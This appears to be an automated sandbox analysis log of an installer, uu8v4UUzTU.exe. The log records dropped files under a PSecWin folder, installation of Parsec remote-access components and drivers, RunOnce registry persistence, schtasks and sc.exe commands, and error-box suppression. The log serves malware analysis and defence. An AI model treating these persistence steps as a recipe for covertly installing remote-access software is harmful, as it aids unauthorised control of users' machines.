Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-0LBKR.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\xpsservices.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\iesysprep.dll (copy)Jump to dropped file
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{6f78882e-1a3d-dc43-867f-898abe828d58}\SETDEC5.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-61DKO.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-0BSQ7.tmpJump to dropped file
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeFile created: C:\Users\user\AppData\Local\Temp\nscF857.tmp\System.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile created: C:\Program Files\Parsec\parsecd.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-PSU9B.tmpJump to dropped file
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeFile created: C:\Program Files\Parsec Virtual Display Driver\driver\mm.dllJump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeFile created: C:\Users\user\AppData\Local\Temp\nstD696.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-U20SU.tmpJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile created: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\System.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\kbdarmty.dll (copy)Jump to dropped file
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{0d19f94d-19ef-cf46-8004-7828b47b053d}\SETE85A.tmpJump to dropped file
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{6f78882e-1a3d-dc43-867f-898abe828d58}\SETDEC5.tmpJump to dropped file
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{6f78882e-1a3d-dc43-867f-898abe828d58}\parsecvusba.sys (copy)Jump to dropped file
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{0d19f94d-19ef-cf46-8004-7828b47b053d}\parsecvirtualds.sys (copy)Jump to dropped file

Boot Survival

barindex
Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce GrpConv
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /delete /tn ParsecTeams /f
Source: C:\Windows\System32\drvinst.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\parsecvusba
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ParsecJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Parsec\Parsec.lnkJump to behavior
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC022AC0 StartServiceCtrlDispatcherW,40_2_00007FF7EC022AC0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce GrpConv
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce GrpConv
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce GrpConv
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce GrpConv
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" control Parsec 200

Hooking and other Techniques for Hiding and Protection

barindex
Tries to open files direct via NTFS file id
Source: C:\Windows\System32\drvinst.exeFile opened: NULL
Source: C:\Windows\System32\drvinst.exeFile opened: NULL
Source: C:\Windows\System32\drvinst.exeFile opened: NULL
Source: C:\Windows\System32\drvinst.exeFile opened: NULL
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec\pservice.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec\pservice.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\grpconv.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\grpconv.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\grpconv.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\grpconv.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C04DD0 SetupDiGetClassDevsW,SetupDiEnumDeviceInfo,SetupDiGetDeviceRegistryPropertyW,GetLastError,GetLastError,LocalFree,LocalAlloc,SetupDiGetDeviceRegistryPropertyW,GetLastError,SetupDiGetDeviceRegistryPropertyW,GetLastError,GetLastError,LocalFree,LocalAlloc,SetupDiGetDeviceRegistryPropertyW,GetLastError,SetupDiGetDeviceRegistryPropertyW,GetLastError,GetLastError,LocalFree,LocalAlloc,SetupDiGetDeviceRegistryPropertyW,GetLastError,SetupDiBuildDriverInfoList,SetupDiEnumDriverInfoW,SetupDiEnumDeviceInfo,GetLastError,SetupDiDestroyDeviceInfoList,SetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,49_2_00007FF763C04DD0
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
